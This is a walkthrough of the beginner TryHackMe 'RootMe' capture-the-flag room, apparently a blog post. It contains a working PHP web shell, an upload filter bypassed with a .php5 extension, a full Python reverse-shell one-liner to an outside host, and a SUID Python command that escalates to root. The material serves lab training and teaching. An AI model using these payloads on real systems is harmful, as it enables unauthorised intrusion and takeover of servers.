6 minutes
THM: RootMe
Title: RootMe
Description:A ctf for beginners, can you root me?
Difficulty:Easy
Tags:
Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.24.75 -oA nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-10 17:31 GMT
Nmap scan report for 10.10.24.75
Host is up (0.022s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: HackIT - Home
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.28 seconds
Website
Since there are only 2 ports, lets start with the website
There is nothing really here. No links or anything hidden in the source so lets running a directory scan
# gobuster dir -u http://10.10.24.75 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.24.75
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/css (Status: 301) [Size: 310] [--> http://10.10.24.75/css/]
/index.php (Status: 200) [Size: 616]
/js (Status: 301) [Size: 309] [--> http://10.10.24.75/js/]
/panel (Status: 301) [Size: 312] [--> http://10.10.24.75/panel/]
/server-status (Status: 403) [Size: 277]
/uploads (Status: 301) [Size: 314] [--> http://10.10.24.75/uploads/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Looking at panel there is a simple form that allows uploads.
Uploading a basic image works and we can see it in the uploads directory. However when we try and upload a basic php this is blocked. It seems this is based on the extension, as renaming the shell to shell.php5 works fine as an upload.
The php shell file is simply <?php echo system($_GET['cmd']); ?>
So with a working a php shell it’s just a case of finding a method to get a reverse shell to the box. In this case a python shell worked
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.18.78",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
User flag
Now we can have a look around the box. We see that we are connected as the www-data user and after moving to the top up a few directories we find the user flag
bash-4.4$ pwd
pwd
/var/www/html/uploads
bash-4.4$ cd ..
cd ..
bash-4.4$ ls
ls
Website.zip css index.php js panel uploads
bash-4.4$ cd ..
cd ..
bash-4.4$ ls
ls
html user.txt
bash-4.4$ cat user.txt
cat user.txt
THM{y*************l}
Privilege escalation
Based on the room questions we look for files with the SUID permission
bash-4.4$ find / -type f -perm -4000 -ls 2>/dev/null
find / -type f -perm -4000 -ls 2>/dev/null
787696 44 -rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
787234 112 -rwsr-xr-x 1 root root 113528 Jul 10 2020 /usr/lib/snapd/snap-confine
918336 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
787659 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
787841 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
787845 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
787467 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
787290 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
787288 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
787086 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
266770 3580 -rwsr-sr-x 1 root root 3665768 Aug 4 2020 /usr/bin/python
787033 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
787084 76 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
787179 76 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
787431 148 -rwsr-xr-x 1 root root 149080 Jan 31 2020 /usr/bin/sudo
787289 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
787306 60 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
787326 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
66 40 -rwsr-xr-x 1 root root 40152 Oct 10 2019 /snap/core/8268/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/8268/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/8268/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/8268/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Oct 10 2019 /snap/core/8268/bin/umount
2665 71 -rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/8268/usr/bin/chfn
2667 40 -rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/8268/usr/bin/chsh
2743 74 -rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/8268/usr/bin/gpasswd
2835 39 -rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/8268/usr/bin/newgrp
2848 53 -rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/8268/usr/bin/passwd
2958 134 -rwsr-xr-x 1 root root 136808 Oct 11 2019 /snap/core/8268/usr/bin/sudo
3057 42 -rwsr-xr-- 1 root systemd-resolve 42992 Jun 10 2019 /snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3427 419 -rwsr-xr-x 1 root root 428240 Mar 4 2019 /snap/core/8268/usr/lib/openssh/ssh-keysign
6462 105 -rwsr-sr-x 1 root root 106696 Dec 6 2019 /snap/core/8268/usr/lib/snapd/snap-confine
7636 386 -rwsr-xr-- 1 root dip 394984 Jun 12 2018 /snap/core/8268/usr/sbin/pppd
66 40 -rwsr-xr-x 1 root root 40152 Jan 27 2020 /snap/core/9665/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/9665/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/9665/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/9665/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Jan 27 2020 /snap/core/9665/bin/umount
2605 71 -rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/9665/usr/bin/chfn
2607 40 -rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/9665/usr/bin/chsh
2683 74 -rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/9665/usr/bin/gpasswd
2775 39 -rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/9665/usr/bin/newgrp
2788 53 -rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/9665/usr/bin/passwd
2898 134 -rwsr-xr-x 1 root root 136808 Jan 31 2020 /snap/core/9665/usr/bin/sudo
2997 42 -rwsr-xr-- 1 root systemd-resolve 42992 Jun 11 2020 /snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3367 419 -rwsr-xr-x 1 root root 428240 May 26 2020 /snap/core/9665/usr/lib/openssh/ssh-keysign
6405 109 -rwsr-xr-x 1 root root 110656 Jul 10 2020 /snap/core/9665/usr/lib/snapd/snap-confine
7582 386 -rwsr-xr-- 1 root dip 394984 Feb 11 2020 /snap/core/9665/usr/sbin/pppd
786527 44 -rwsr-xr-x 1 root root 43088 Jan 8 2020 /bin/mount
786567 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
786500 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
786551 64 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
786585 28 -rwsr-xr-x 1 root root 26696 Jan 8 2020 /bin/umount
Looking through the list /usr/bin/python stands out. So using GTFOBins we can privesc :)
bash-4.4$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# cat root.txt
cat root.txt
THM{p******************n}